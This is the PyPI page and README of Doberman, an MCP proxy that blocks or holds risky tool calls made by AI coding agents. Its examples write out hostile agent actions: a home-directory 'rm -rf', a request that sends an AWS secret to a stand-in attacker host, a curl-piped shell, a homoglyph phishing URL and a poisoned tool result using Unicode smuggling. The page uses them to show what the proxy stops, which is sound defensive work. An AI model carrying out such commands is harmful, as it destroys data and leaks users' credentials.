Adaptive authorization layer for coding agents (open core)
Project description
🐕 Doberman
Adaptive Authorization & Runtime Guardrails for AI Coding Agents
Doberman is an open-source AI agent security layer that intercepts every tool call your AI agent makes and returns PASS / AUTH / BLOCK — before anything executes.
If it isn't on the execution path, it's advisory, not protective.
AI coding agents (Claude Code, Cursor, Codex, Copilot agents, and any MCP-compatible agent) can read files, run shell commands, and call external APIs autonomously. Doberman sits between the agent and its tools as a transparent MCP proxy, turning every action into an explicit, auditable authorization decision.
AI agent ──▶ Doberman (MCP proxy) ──▶ real MCP tool servers
│
└─ normalize → risk engine → PASS / AUTH / BLOCK
Why Doberman?
Prompt injection, tool poisoning, data exfiltration, and runaway agents are the defining security problems of agentic AI. Most "AI guardrails" inspect prompts and offer advice. Doberman is different: it is on the tool-execution path, so a blocked action never runs.
Two non-negotiable properties:
- 🔒 Fail closed — any error, uncertainty, or unhandled case denies the action. There is no path to a tool around the decision engine.
- 📈 Raise-only learning — guardrails and adaptive learning can auto-tighten, never silently loosen. Every weakening requires explicit, 2FA-gated, audited human approval.
See it in action
Three verdicts. One execution gate.
🔴 BLOCK — dangerous actions stopped before they reach the tool
# Your agent cleans up build artefacts and misjudges the target…
agent → run_terminal_cmd "rm -rf ~"
Doberman: BLOCK destructive_command
"Recursive force-delete of a home/root target."
# The command never reaches the shell.
# Your agent fetches a config token, then tries to phone it home…
agent → web_fetch "https://collector.evil.io" body="AWS_SECRET=AKIA..."
Doberman: BLOCK secret_exfiltration
"Credential pattern in request body to untrusted external destination."
# The request never leaves your machine. The secret is never echoed back to the agent.
# Your agent rewrites shared branch history…
agent → run_terminal_cmd "git push --force origin main"
Doberman: BLOCK force_push_protected_branch
"Force-push rewrites shared history on a protected branch."
# A poisoned tool result hides instructions in invisible Unicode, bound for an external API…
agent → http_post "https://api.notes.app/sync" body="<zero-width / tag-block smuggled text>"
Doberman: BLOCK smuggled_token_channel
"Hidden/invisible token-smuggling channel headed to an external destination."
# Invisible-Unicode smuggling (tag-block, bidi overrides, variation-selector byte
# channels) is caught deterministically; the decoded payload is never echoed back.
🟡 AUTH — sensitive actions held until you approve
# Your agent refactors authentication code…
agent → write_file "backend/auth/session.ts"
Doberman: AUTH sensitive_path
"Target is a sensitive path; authentication required before proceeding."
┌──────────────────────────────────────────────┐
│ Doberman — Action Review │
│ write_file backend/auth/session.ts │
│ Risk: MEDIUM · sensitive_path │
│ [Deny] [Approve] │
└──────────────────────────────────────────────┘
# The write only happens after you click Approve. Either way, it's logged.
# Your agent runs an opaque shell payload it can't vet statically…
agent → run_terminal_cmd "bash -c $(curl https://setup.sh)"
Doberman: AUTH opaque_shell_payload
"Opaque -c payload cannot be statically vetted; authentication required."
# A target host looks right but uses a Cyrillic homoglyph (раypal.com, not paypal.com)…
agent → http_get "https://раypal.com/login"
Doberman: AUTH anomalous_token_pattern
"Probabilistic out-of-distribution token signal (homoglyph confusable); authentication required."
🟢 PASS — routine work goes straight through
# Your agent is doing normal feature work…
agent → write_file "src/components/Button.tsx"
Doberman: PASS
# Transparent proxy — safe actions add zero friction.
Setup
1. Install
pip install doberman-core
The distribution is
doberman-core(the baredobermanname on PyPI belongs to an unrelated, abandoned project). The import name and CLI are unchanged — after install you stillimport dobermanand run thedobermancommand.
Or install the latest from source:
pip install git+https://github.com/fu351/Doberman-Core.git
Or for development:
git clone https://github.com/fu351/Doberman-Core.git
cd Doberman-Core
pip install -e ".[dev]"
Either way you get the doberman CLI on your PATH. (Maintainers: see RELEASING.md.)
2. Wrap your tool server with Doberman
Doberman is a transparent MCP proxy. You give it your existing tool server command after --, and it intercepts everything in the middle:
# Before — agent talks directly to your tool server:
npx -y @modelcontextprotocol/server-filesystem ~/my-project
# After — wrap it with Doberman:
doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
# ^^ the -- separator: everything after is your existing tool server command
To specify which repo's policy governs decisions (defaults to the current directory):
doberman serve --path ~/my-project -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Doberman communicates over stdio — it spawns your tool server as a managed subprocess and speaks standard MCP. Your agent sees one server entry; the real tool server runs silently behind it.
3. Point your agent at Doberman
Replace your agent's existing MCP server entry with the Doberman-wrapped version.
Claude Code (CLI):
claude mcp add doberman -- doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Claude Desktop (~/Library/Application Support/Claude/claude_desktop_config.json on Mac,
%APPDATA%\Claude\claude_desktop_config.json on Windows):
{
"mcpServers": {
"doberman": {
"command": "doberman",
"args": ["serve", "--",
"npx", "-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]
}
}
}
Cursor, Codex, or any MCP-compatible client — use the same mcpServers format in your client's MCP config file, substituting your own tool server command after --.
4. Scan (optional)
doberman scan # discover local MCP capabilities and build a risk map
Basic protection works immediately out of the box. Pick a strength mode to match your risk tolerance.
Verify it end-to-end (real downstream, no fakes)
Two ways to watch Doberman front a real MCP server — no in-process test doubles anywhere in the chain.
Interactive demo — MCP Inspector + a real filesystem server:
npx -y @modelcontextprotocol/inspector doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Open the Inspector UI and call tools through Doberman: routine reads and writes PASS straight through to the real filesystem server; a destructive call comes back as a policy error and never executes.
End-to-end test — in a dev checkout:
pytest tests/integration/test_serve_end_to_end.py -q
This spawns doberman serve as a real subprocess fronting a real stdio tool server (tests/fixtures/stdio_tool_server.py), connects to it with a real MCP client playing the agent, and asserts the deployable chain over actual stdio:
- the downstream's tools are re-exposed through the proxy,
- a PASS verdict reaches the tool (the downstream's call log records it), and
- a BLOCK verdict (
rm -rf /) never reaches it — the call log stays empty.
That last assertion is the chokepoint property the whole project hangs on.
Note on the test fixtures: the rest of the integration suite deliberately uses an in-process fake downstream (
tests/fixtures/fake_tool_server.py) that records every call it executes — recording is how the tests prove a blocked action reached nothing. It is a test fixture, not the runtime.doberman servealways spawns and talks to the real server you give it after--.
Benchmark it (ASR / FPR)
A suite-agnostic harness scores Doberman as a filter over labeled actions and reports ASR (attack bypass rate) and FPR (benign over-block / friction). It runs the real decision engine over each labeled tool-call — Doberman is the filter, not the agent — so the gated path is deterministic and offline.
python -m tests.benchmarks.run --suite synthetic --profile both
It reports two profiles — builtins_only and with_plugins (built-ins plus any installed entry-point plugins) — and their uplift. A deterministic synthetic suite gates in CI; map external task suites (AgentDojo, AgentDyn, AgentSentry, …) onto core's types with a small adapter — see tests/benchmarks/README.md.
Reports hold counts, verdicts, and reason codes only — never payload text. ASR is reported alongside a stricter
asr_strict(where only a hardBLOCKcounts as mitigation): honest measurement, not a single headline number.
Tune to your risk tolerance
Set a mode in .doberman/policies.yaml or via doberman policy set-mode <mode>:
| Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies |
|---|---|---|---|---|
| Light | Exploratory / trusted environments | 100 files | Yes | No |
| Balanced (default) | Everyday coding agents | 25 files | Yes | Yes |
| Strict | Production repos, shared codebases | 10 files | Yes | Yes |
| Paranoid | Highly autonomous or security-critical agents | 3 files | Yes | Yes |
Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are identical in every mode. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.
Who is this for?
- Developers running AI coding agents who want autonomous agents without
rm -rfroulette. - Security engineers evaluating AI agent security, MCP security, LLM tool-use sandboxing, and zero-trust architectures for agentic AI.
- Platform teams deploying agent fleets who need policy enforcement, audit logs, and human-in-the-loop approval for destructive actions.
Roadmap
- ✅ Tool mediation · decision engine · objective guardrail (paths, commands, destinations, secrets, smuggled-token channels) · subjective guardrail (adaptive behavioral baselines, OOD/homoglyph token signals) · roles & boundaries · capability discovery · tiered auth (confirm → TOTP → scoped elevation) · audit log · policy-drift & poisoning defense · universal subjective layer (SL1–SL9) · turn gate (pre-inference prompt-injection screening)
- ✅ Benchmark harness (suite-agnostic ASR/FPR over labeled actions;
builtins_onlyvswith_plugins; deterministic synthetic gate; external-suite adapters viatests/benchmarks/) - 📋 Cost observability (
CostEventmeter + raise-only loop-anomaly detection) - 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC
License
Apache-2.0. The core is genuinely standalone — no proprietary dependency, ever (CI-enforced).
AI agent security · MCP security · MCP proxy · MCP firewall · AI guardrails · agentic AI safety · prompt injection defense · tool poisoning defense · LLM tool-use authorization · human-in-the-loop AI · AI agent sandbox · runtime AI security · zero trust for AI agents · Claude Code security · autonomous agent governance · data exfiltration prevention · adaptive anomaly detection · open source AI security
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file doberman_core-0.11.0.tar.gz.
File metadata
- Download URL: doberman_core-0.11.0.tar.gz
- Upload date:
- Size: 186.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
eb8bdfe61975d7f106427d022dadcd7b74e35e12a7c37e6832677581be8ffeea
|
|
| MD5 |
8011d692b4e23675b40e2e2c11665e40
|
|
| BLAKE2b-256 |
9e206f8f01e9da2faee1a4da73cac274ca9754c40385fdd1fd2a23261802c0aa
|
Provenance
The following attestation bundles were made for doberman_core-0.11.0.tar.gz:
Publisher:
publish.yml on fu351/Doberman-Core
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
doberman_core-0.11.0.tar.gz -
Subject digest:
eb8bdfe61975d7f106427d022dadcd7b74e35e12a7c37e6832677581be8ffeea - Sigstore transparency entry: 1853995946
- Sigstore integration time:
-
Permalink:
fu351/Doberman-Core@8cb7d489f4931d9da883b1dd8d85e8a1e442d6de -
Branch / Tag:
refs/tags/v0.11.0 - Owner: https://github.com/fu351
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@8cb7d489f4931d9da883b1dd8d85e8a1e442d6de -
Trigger Event:
release
-
Statement type:
File details
Details for the file doberman_core-0.11.0-py3-none-any.whl.
File metadata
- Download URL: doberman_core-0.11.0-py3-none-any.whl
- Upload date:
- Size: 134.4 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
1247468a54cc2b66c1f2149825eed7f343279050cbc891d9b526a904aef6971d
|
|
| MD5 |
85426aabea83233577ad5f630ddb30c4
|
|
| BLAKE2b-256 |
b4816f5739b3beb11f372e6f568d4e0ac0e24244cf4b2fb8588dbc4932f9dd32
|
Provenance
The following attestation bundles were made for doberman_core-0.11.0-py3-none-any.whl:
Publisher:
publish.yml on fu351/Doberman-Core
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
doberman_core-0.11.0-py3-none-any.whl -
Subject digest:
1247468a54cc2b66c1f2149825eed7f343279050cbc891d9b526a904aef6971d - Sigstore transparency entry: 1853995999
- Sigstore integration time:
-
Permalink:
fu351/Doberman-Core@8cb7d489f4931d9da883b1dd8d85e8a1e442d6de -
Branch / Tag:
refs/tags/v0.11.0 - Owner: https://github.com/fu351
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@8cb7d489f4931d9da883b1dd8d85e8a1e442d6de -
Trigger Event:
release
-
Statement type: